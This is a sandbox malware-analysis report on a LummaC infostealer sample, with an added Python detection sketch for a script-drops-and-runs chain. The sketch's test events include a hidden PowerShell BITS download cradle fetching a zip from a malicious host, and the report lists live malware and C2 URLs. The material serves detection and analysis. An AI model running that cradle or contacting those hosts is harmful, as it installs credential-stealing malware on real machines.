    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitsTransfer\Microsoft.BackgroundIntelligentTransfer.Management.Interop.dll VolumeInformationJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitsTransfer\Microsoft.BackgroundIntelligentTransfer.Management.Interop.dll VolumeInformationJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitsTransfer\Microsoft.BackgroundIntelligentTransfer.Management.Interop.dll VolumeInformationJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.BackgroundIntelligentTransfer.Management\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.BackgroundIntelligentTransfer.Management.dll VolumeInformationJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0013~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0314~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.KeyDistributionService.Cmdlets\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.KeyDistributionService.Cmdlets.dll VolumeInformationJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.KeyDistributionService.Cmdlets\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.KeyDistributionService.Cmdlets.dll VolumeInformationJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.KeyDistributionService.Cmdlets\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.KeyDistributionService.Cmdlets.dll VolumeInformationJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.IO.Compression\v4.0_4.0.0.0__b77a5c561934e089\System.IO.Compression.dll VolumeInformationJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.IO.Compression.FileSystem\v4.0_4.0.0.0__b77a5c561934e089\System.IO.Compression.FileSystem.dll VolumeInformationJump to behavior
    Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformationJump to behavior
    Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformationJump to behavior
    Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformationJump to behavior
    Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformationJump to behavior
    Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformationJump to behavior
    Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformationJump to behavior
    Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformationJump to behavior
    Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.db VolumeInformationJump to behavior
    Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.jfm VolumeInformationJump to behavior
    Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.db VolumeInformationJump to behavior
    Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.db VolumeInformationJump to behavior
    Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ VolumeInformationJump to behavior
    Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ VolumeInformationJump to behavior
    Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exeQueries volume information: C:\ VolumeInformationJump to behavior
    Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exeQueries volume information: C:\ VolumeInformationJump to behavior
    Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exeCode function: 4_2_00414200 GetLocalTime,4_2_00414200
    Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exeCode function: 4_2_00476750 LookupAccountNameW,GetSidIdentifierAuthority,GetSidSubAuthorityCount,GetSidSubAuthority,4_2_00476750
    Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exeCode function: 4_2_004A83C0 _memset,_memset,GetVersionExW,4_2_004A83C0
    Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exe | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid
    Source: Amcache.hve.12.drBinary or memory string: c:\programdata\microsoft\windows defender\platform\4.18.23080.2006-0\msmpeng.exe
    Source: Amcache.hve.12.drBinary or memory string: msmpeng.exe
    Source: Amcache.hve.12.drBinary or memory string: c:\program files\windows defender\msmpeng.exe
    Source: Amcache.hve.12.drBinary or memory string: MsMpEng.exe

    Stealing of Sensitive Information

    Source: Yara match | File source: decrypted.memstr, type: MEMORYSTR

    Remote Access Functionality

    Source: Yara match | File source: decrypted.memstr, type: MEMORYSTR
    Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exeCode function: 4_2_0040D05C RpcBindingFree,LeaveCriticalSection,4_2_0040D05C
    Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exeCode function: 4_2_0040D0B0 WaitForSingleObject,WaitForSingleObject,EnterCriticalSection,RpcBindingFree,LeaveCriticalSection,SetEvent,CloseHandle,4_2_0040D0B0
    Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exeCode function: 4_2_0040CDF0 EnterCriticalSection,RpcStringBindingComposeW,RpcBindingFromStringBindingW,RpcStringFreeW,RpcEpResolveBinding,RpcStringFreeW,RpcBindingFree,RpcStringFreeW,LeaveCriticalSection,4_2_0040CDF0
    Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exeCode function: 4_2_0040CEEC RpcBindingFree,RpcStringFreeW,LeaveCriticalSection,4_2_0040CEEC
    Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exeCode function: 4_2_0040CF40 EnterCriticalSection,RpcBindingFree,LeaveCriticalSection,SetEvent,4_2_0040CF40
    MITRE ATT&CK Matrix, listed per tactic. A number in front of a technique is the count of matched signatures; techniques without a number were not matched.

    Reconnaissance: Gather Victim Identity Information | Credentials | Email Addresses | Employee Names | Gather Victim Network Information | Domain Properties | DNS | Network Trust Dependencies | Network Topology
    Resource Development: Acquire Infrastructure | Domains | DNS Server | Virtual Private Server | Server | Botnet | Web Services | Serverless | Malvertising
    Initial Access: Valid Accounts | Default Accounts | Domain Accounts | Local Accounts | Cloud Accounts | Replication Through Removable Media | External Remote Services | Drive-by Compromise | Exploit Public-Facing Application
    Execution: 1 Windows Management Instrumentation | 1 Native API | 12 Service Execution | 3 PowerShell | Launchd | Scheduled Task | Systemd Timers | Container Orchestration Job | Command and Scripting Interpreter
    Persistence: 1 DLL Side-Loading | 1 BITS Jobs | 12 Windows Service | 1 Registry Run Keys / Startup Folder | 1 Bootkit | RC Scripts | Startup Items | Scheduled Task/Job | At
    Privilege Escalation: 1 DLL Side-Loading | 1 Access Token Manipulation | 12 Windows Service | 11 Process Injection | 1 Registry Run Keys / Startup Folder | RC Scripts | Startup Items | Scheduled Task/Job | At
    Defense Evasion: 11 Deobfuscate/Decode Files or Information | 3 Obfuscated Files or Information | 1 DLL Side-Loading | 1 Masquerading | 41 Virtualization/Sandbox Evasion | 1 Access Token Manipulation | 1 BITS Jobs | 11 Process Injection | 1 Bootkit
    Credential Access: 1 Input Capture | LSASS Memory | Security Account Manager | NTDS | LSA Secrets | Cached Domain Credentials | DCSync | Proc Filesystem | /etc/passwd and /etc/shadow
    Discovery: 1 System Time Discovery | 1 Account Discovery | 2 File and Directory Discovery | 45 System Information Discovery | 61 Security Software Discovery | 41 Virtualization/Sandbox Evasion | 2 Process Discovery | 11 Application Window Discovery | 1 System Owner/User Discovery
    Lateral Movement: Remote Services | Remote Desktop Protocol | SMB/Windows Admin Shares | Distributed Component Object Model | SSH | VNC | Windows Remote Management | Cloud Services | Direct Cloud VM Connections
    Collection: 1 Archive Collected Data | 1 Input Capture | 2 Clipboard Data | Input Capture | Keylogging | GUI Input Capture | Web Portal Capture | Credential API Hooking | Data Staged
    Command and Control: 1 Ingress Tool Transfer | 21 Encrypted Channel | 3 Non-Application Layer Protocol | 114 Application Layer Protocol | Fallback Channels | Multiband Communication | Commonly Used Port | Application Layer Protocol | Web Protocols
    Exfiltration: Exfiltration Over Other Network Medium | Exfiltration Over Bluetooth | Automated Exfiltration | Traffic Duplication | Scheduled Transfer | Data Transfer Size Limits | Exfiltration Over C2 Channel | Exfiltration Over Alternative Protocol | Exfiltration Over Symmetric Encrypted Non-C2 Protocol
    Impact: Abuse Accessibility Features | Network Denial of Service | Data Encrypted for Impact | Data Destruction | Data Encrypted for Impact | Service Stop | Inhibit System Recovery | Defacement | Internal Defacement
    Behavior Graph (ID: 1519581; Cookbook: defaultwindowscmdlinecookbook.jbs; Start date: 26/09/2024; Architecture: WINDOWS; Score: 100)

    Contacted hosts: racedsuitreow.shop, finalstepgo.com, candleduseiwo.shop
    Top-level signatures: Suricata IDS alerts for network traffic; Found malware configuration; Malicious sample detected (through community Yara rule); 6 other signatures

    Process tree (graph node ids in brackets):
      cmd.exe [9]
        signature: Suspicious powershell command line found
        powershell.exe [17]
          network: finalstepgo.com, 185.255.122.133 port 443 (local ports 49730, 49734), ICMESE, Netherlands
          dropped: C:\Users\user\AppData\...\PrivacyDrive.exe (PE32)
          signatures: Powershell uses Background Intelligent Transfer Service (BITS); Loading BitLocker PowerShell Module; Powershell drops PE file
          PrivacyDrive.exe [26]
            network: racedsuitreow.shop, 172.67.206.221 port 443 (local ports 49744, 49745), CLOUDFLARENETUS, United States
            signature: Contains functionality to infect the boot sector
            WerFault.exe [30]
              dropped: C:\ProgramData\Microsoft\...\Report.wer (Unicode)
            WerFault.exe [33]
              dropped: C:\ProgramData\Microsoft\...\Report.wer (Unicode)
            WerFault.exe [35]
              dropped: C:\ProgramData\Microsoft\...\Report.wer (Unicode)
            WerFault.exe [37]
        conhost.exe [22]
      PrivacyDrive.exe [12]
        WerFault.exe [24]
          dropped: C:\ProgramData\Microsoft\...\Report.wer (Unicode)
      svchost.exe [14]
        network: 127.0.0.1
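    The process tree above is a chain that endpoint telemetry can correlate: cmd.exe starts powershell.exe, PowerShell pulls a payload over BITS, writes PrivacyDrive.exe into a random-named folder directly under AppData\Roaming, and then starts it. The Python below is an added detection sketch written for this report; it is not code from Joe Sandbox or from the LummaC sample. It runs over constructed Sysmon-style ProcessCreate/FileCreate events modelled on this tree. The PowerShell command line in the sample data, including the Start-BitsTransfer cradle, is an assumption, because the report does not print the actual command line, only the fact that BITS was used.

```python
import re

# Constructed Sysmon-style events modelled on the process tree in this report
# (cmd.exe -> powershell.exe -> PrivacyDrive.exe). They are illustrative, not
# events exported from the sandbox run. The PowerShell command line is an
# assumption: the report shows BITS use but not the command line itself.
EVENTS = [
    {"type": "ProcessCreate", "pid": 9, "ppid": 2,
     "image": r"C:\Windows\System32\cmd.exe", "cmdline": "cmd.exe /c ..."},
    {"type": "ProcessCreate", "pid": 17, "ppid": 9,
     "image": r"C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe",
     "cmdline": ("powershell.exe -w hidden -c Start-BitsTransfer "
                 "-Source https://finalstepgo.com/uploads/il222.zip -Destination $env:TEMP")},
    {"type": "FileCreate", "pid": 17,
     "target": r"C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exe"},
    {"type": "ProcessCreate", "pid": 26, "ppid": 17,
     "image": r"C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exe",
     "cmdline": "PrivacyDrive.exe"},
    # Benign control: Explorer saving and running an installer from Downloads.
    {"type": "ProcessCreate", "pid": 40, "ppid": 1,
     "image": r"C:\Windows\explorer.exe", "cmdline": "explorer.exe"},
    {"type": "FileCreate", "pid": 40, "target": r"C:\Users\user\Downloads\setup.exe"},
    {"type": "ProcessCreate", "pid": 41, "ppid": 40,
     "image": r"C:\Users\user\Downloads\setup.exe", "cmdline": "setup.exe"},
]

SCRIPT_HOSTS = {"powershell.exe", "pwsh.exe", "cmd.exe", "wscript.exe",
                "cscript.exe", "mshta.exe"}
# A .exe written into a random-looking folder directly under AppData\Roaming,
# as in C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exe.
ROAMING_DROP = re.compile(r"\\AppData\\Roaming\\[A-Za-z0-9]{6,12}\\[^\\]+\.exe$",
                          re.IGNORECASE)
# Start-BitsTransfer followed by a URL (assumed cradle shape, see above).
BITS_CRADLE = re.compile(r"Start-BitsTransfer\b.*https?://", re.IGNORECASE)


def basename(path):
    return path.rsplit("\\", 1)[-1].lower()


def uses_bits_download(cmdline):
    """True when the command line drives a BITS download with an explicit URL."""
    return bool(BITS_CRADLE.search(cmdline))


def detect_script_dropped_pe(events):
    # Correlate FileCreate and ProcessCreate in arrival order: alert when a
    # script host writes a .exe into a random AppData Roaming folder and that
    # exact path is later started as a process.
    procs = {}     # pid -> ProcessCreate event seen so far
    dropped = {}   # lowercased dropped path -> pid of the writer
    alerts = []
    for ev in events:
        if ev["type"] == "ProcessCreate":
            procs[ev["pid"]] = ev
            writer = dropped.get(ev["image"].lower())
            if writer is not None:
                alerts.append({
                    "rule": "script-host-drop-and-execute",
                    "writer_pid": writer,
                    "writer_image": procs[writer]["image"],
                    "writer_used_bits": uses_bits_download(procs[writer]["cmdline"]),
                    "executed_pid": ev["pid"],
                    "parent_pid": ev["ppid"],
                    "path": ev["image"],
                })
        elif ev["type"] == "FileCreate":
            writer = procs.get(ev["pid"])
            if writer and basename(writer["image"]) in SCRIPT_HOSTS \
                    and ROAMING_DROP.search(ev["target"]):
                dropped[ev["target"].lower()] = ev["pid"]
    return alerts


if __name__ == "__main__":
    for alert in detect_script_dropped_pe(EVENTS):
        print(alert)
```

    The correlation keys on the exact dropped path rather than on the parent process, so it still fires if the payload is launched later by a scheduled task or a second script instead of by the PowerShell that wrote it; the BITS flag is additional context, not a condition.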

    No Antivirus matches
    Source | Detection | Scanner | Label
    http://ocsp.thawte.com0 | 0% | URL Reputation | safe
    http://upx.sf.net | 0% | URL Reputation | safe
    http://crl.thawte.com/ThawteTimestampingCA.crl0 | 0% | URL Reputation | safe
    https://racedsuitreow.shop/P | 100% | Avira URL Cloud | malware
    https://g.live.com/odclientsettings/ProdV2.C: | 0% | Avira URL Cloud | safe
    https://finalstepgo.com/ | 100% | Avira URL Cloud | malware
    covvercilverow.shop | 100% | Avira URL Cloud | malware
    https://racedsuitreow.shop/apiJV& | 100% | Avira URL Cloud | malware
    https://www.cloudflare.com/learning/access-management/phishing-attack/ | 0% | Avira URL Cloud | safe
    https://racedsuitreow.shop/apiU.h | 100% | Avira URL Cloud | malware
    https://finalstepgo.com/uploads/il222.zip | 100% | Avira URL Cloud | malware
    pumpkinkwquo.shop | 100% | Avira URL Cloud | malware
    http://crl.ver) | 0% | Avira URL Cloud | safe
    abortinoiwiam.shop | 100% | Avira URL Cloud | malware
    deallyharvenw.shop | 100% | Avira URL Cloud | malware
    http://www.privacy-drive.comx | 0% | Avira URL Cloud | safe
    https://www.cloudflare.com/5xx-error-landing | 0% | Avira URL Cloud | safe
    https://www.thawte.com/cps0 | 0% | Avira URL Cloud | safe
    https://finalstepgo.com/uploads/il222.zipK | 100% | Avira URL Cloud | malware
    https://finalstepgo.com:443/uploads/il222.zip | 100% | Avira URL Cloud | malware
    https://www.cloudflare.com/learning/access-ma | 0% | Avira URL Cloud | safe
    defenddsouneuw.shop | 100% | Avira URL Cloud | malware
    https://racedsuitreow.shop/apiV | 100% | Avira URL Cloud | malware
    priooozekw.shop | 100% | Avira URL Cloud | malware
    https://racedsuitreow.shop/ | 100% | Avira URL Cloud | malware
    https://racedsuitreow.shop/)e3 | 100% | Avira URL Cloud | malware
    https://g.live.com/odclientsettings/ProdV2 | 0% | Avira URL Cloud | safe
    https://finalstepgo.com/a | 100% | Avira URL Cloud | malware
    https://racedsuitreow.shop/apisP | 100% | Avira URL Cloud | malware
    https://g.live.com/odclientsettings/Prod.C: | 0% | Avira URL Cloud | safe
    https://racedsuitreow.shop/api | 100% | Avira URL Cloud | malware
    https://g.live.com/odclientsettings/ProdV2?OneDriveUpdate=f359a5df14f97b6802371976c96 | 0% | Avira URL Cloud | safe
    https://racedsuitreow.shop/3 | 100% | Avira URL Cloud | malware
    surroundeocw.shop | 100% | Avira URL Cloud | malware
    https://www.thawte.com/cps0/ | 0% | Avira URL Cloud | safe
    racedsuitreow.shop | 100% | Avira URL Cloud | malware
    https://racedsuitreow.shop:443/api | 100% | Avira URL Cloud | malware
    https://www.thawte.com/repository0W | 0% | Avira URL Cloud | safe
    candleduseiwo.shop | 100% | Avira URL Cloud | malware
    https://racedsuitreow.shop/apie | 100% | Avira URL Cloud | malware
    https://www.cybertronsoft.com | 0% | Avira URL Cloud | safe
    http://crl.thawte.com/ThawtePremiumServerCA.crl0 | 0% | Avira URL Cloud | safe
    https://finalstepgo.com/uploads/il2.txt | 100% | Avira URL Cloud | malware
    https://g.live.com/1rewlive5skydrive/OneDriveProductionV2?OneDriveUpdate=9c123752e31a927b78dc96231b6 | 0% | Avira URL Cloud | safe
    https://finalstepgo.com:443/uploads/il222.zipe | 100% | Avira URL Cloud | malware
    Name | IP | Active | Malicious | Antivirus Detection | Reputation
    racedsuitreow.shop | 172.67.206.221 | true | true |  | unknown
    finalstepgo.com | 185.255.122.133 | true | true |  | unknown
    candleduseiwo.shop | unknown | unknown | true |  | unknown
    Name | Malicious | Antivirus Detection | Reputation
    https://finalstepgo.com/uploads/il222.zip | false | Avira URL Cloud: malware | unknown
    covvercilverow.shop | true | Avira URL Cloud: malware | unknown
    pumpkinkwquo.shop | true | Avira URL Cloud: malware | unknown
    abortinoiwiam.shop | true | Avira URL Cloud: malware | unknown
    deallyharvenw.shop | true | Avira URL Cloud: malware | unknown
    defenddsouneuw.shop | true | Avira URL Cloud: malware | unknown
    priooozekw.shop | true | Avira URL Cloud: malware | unknown
    https://racedsuitreow.shop/api | true | Avira URL Cloud: malware | unknown
    surroundeocw.shop | true | Avira URL Cloud: malware | unknown
    racedsuitreow.shop | true | Avira URL Cloud: malware | unknown
    candleduseiwo.shop | true | Avira URL Cloud: malware | unknown
    https://finalstepgo.com/uploads/il2.txt | true | Avira URL Cloud: malware | unknown
    Name | Source | Malicious | Antivirus Detection | Reputation
    https://www.cloudflare.com/learning/access-management/phishing-attack/ | PrivacyDrive.exe, 00000004.00000003.1923349621.00000000011DF000.00000004.00000020.00020000.00000000.sdmp, PrivacyDrive.exe, 00000008.00000003.2028857496.0000000001610000.00000004.00000020.00020000.00000000.sdmp, PrivacyDrive.exe, 00000008.00000003.2040432796.0000000001610000.00000004.00000020.00020000.00000000.sdmp, PrivacyDrive.exe, 00000008.00000003.2028656440.0000000001551000.00000004.00000020.00020000.00000000.sdmp, PrivacyDrive.exe, 00000008.00000002.2150460238.0000000001610000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
    https://racedsuitreow.shop/P | PrivacyDrive.exe, 00000004.00000002.2151995341.00000000011DF000.00000004.00000020.00020000.00000000.sdmp | true | Avira URL Cloud: malware | unknown
    https://racedsuitreow.shop/apiU.h | PrivacyDrive.exe, 00000008.00000003.2028857496.00000000015D8000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: malware | unknown
    http://ocsp.thawte.com0 | PrivacyDrive.exe.2.dr | false | URL Reputation: safe | unknown
    https://finalstepgo.com/ | svchost.exe, 00000003.00000002.2896914287.0000024B090FA000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000003.00000002.2896766529.0000024B09085000.00000004.00000020.00020000.00000000.sdmp | true | Avira URL Cloud: malware | unknown
    http://crl.ver) | svchost.exe, 00000003.00000002.2896624234.0000024B0900D000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
    https://g.live.com/odclientsettings/ProdV2.C: | edb.log.3.dr | false | Avira URL Cloud: safe | unknown
    https://racedsuitreow.shop/apiJV& | PrivacyDrive.exe, 00000008.00000002.2150460238.000000000153A000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: malware | unknown
    http://upx.sf.net | Amcache.hve.12.dr | false | URL Reputation: safe | unknown
    http://www.privacy-drive.comx | PrivacyDrive.exe, 00000004.00000002.2151132618.0000000000552000.00000002.00000001.01000000.00000006.sdmp, PrivacyDrive.exe, 00000004.00000000.1815371616.0000000000552000.00000002.00000001.01000000.00000006.sdmp, PrivacyDrive.exe, 00000004.00000003.1912706269.00000000052C4000.00000004.00000800.00020000.00000000.sdmp, PrivacyDrive.exe, 00000008.00000002.2149603912.0000000000552000.00000002.00000001.01000000.00000006.sdmp, PrivacyDrive.exe, 00000008.00000000.1925315316.0000000000552000.00000002.00000001.01000000.00000006.sdmp, PrivacyDrive.exe, 00000008.00000003.2019923963.0000000005386000.00000004.00000800.00020000.00000000.sdmp, PrivacyDrive.exe.2.dr | false | Avira URL Cloud: safe | unknown
    https://www.thawte.com/cps0 | PrivacyDrive.exe.2.dr | false | Avira URL Cloud: safe | unknown
    https://finalstepgo.com/uploads/il222.zipK | svchost.exe, 00000003.00000002.2896857883.0000024B090DE000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: malware | unknown
    https://finalstepgo.com:443/uploads/il222.zip | svchost.exe, 00000003.00000002.2896766529.0000024B0905B000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: malware | unknown
    https://www.cloudflare.com/learning/access-ma | PrivacyDrive.exe, 00000004.00000002.2152306256.0000000001712000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
    https://www.cloudflare.com/5xx-error-landing | PrivacyDrive.exe, 00000004.00000003.1923349621.00000000011DF000.00000004.00000020.00020000.00000000.sdmp, PrivacyDrive.exe, 00000004.00000002.2151995341.00000000011DF000.00000004.00000020.00020000.00000000.sdmp, PrivacyDrive.exe, 00000004.00000003.1923320011.0000000001718000.00000004.00000020.00020000.00000000.sdmp, PrivacyDrive.exe, 00000008.00000003.2028656440.00000000015D0000.00000004.00000020.00020000.00000000.sdmp, PrivacyDrive.exe, 00000008.00000003.2028857496.0000000001610000.00000004.00000020.00020000.00000000.sdmp, PrivacyDrive.exe, 00000008.00000003.2028656440.0000000001551000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
    https://racedsuitreow.shop/apiV | PrivacyDrive.exe, 00000004.00000002.2151995341.00000000011DF000.00000004.00000020.00020000.00000000.sdmp, PrivacyDrive.exe, 00000004.00000003.1921722991.00000000011B3000.00000004.00000020.00020000.00000000.sdmp, PrivacyDrive.exe, 00000004.00000002.2151995341.00000000011B3000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: malware | unknown
    https://g.live.com/odclientsettings/Prod.C: | edb.log.3.dr | false | Avira URL Cloud: safe | unknown
    https://racedsuitreow.shop/ | PrivacyDrive.exe, 00000008.00000002.2150460238.0000000001557000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: malware | unknown
    https://racedsuitreow.shop/)e3 | PrivacyDrive.exe, 00000004.00000002.2152306256.0000000001722000.00000004.00000020.00020000.00000000.sdmp, PrivacyDrive.exe, 00000004.00000003.1933666752.000000000171F000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: malware | unknown
    https://g.live.com/odclientsettings/ProdV2 | edb.log.3.dr | false | Avira URL Cloud: safe | unknown
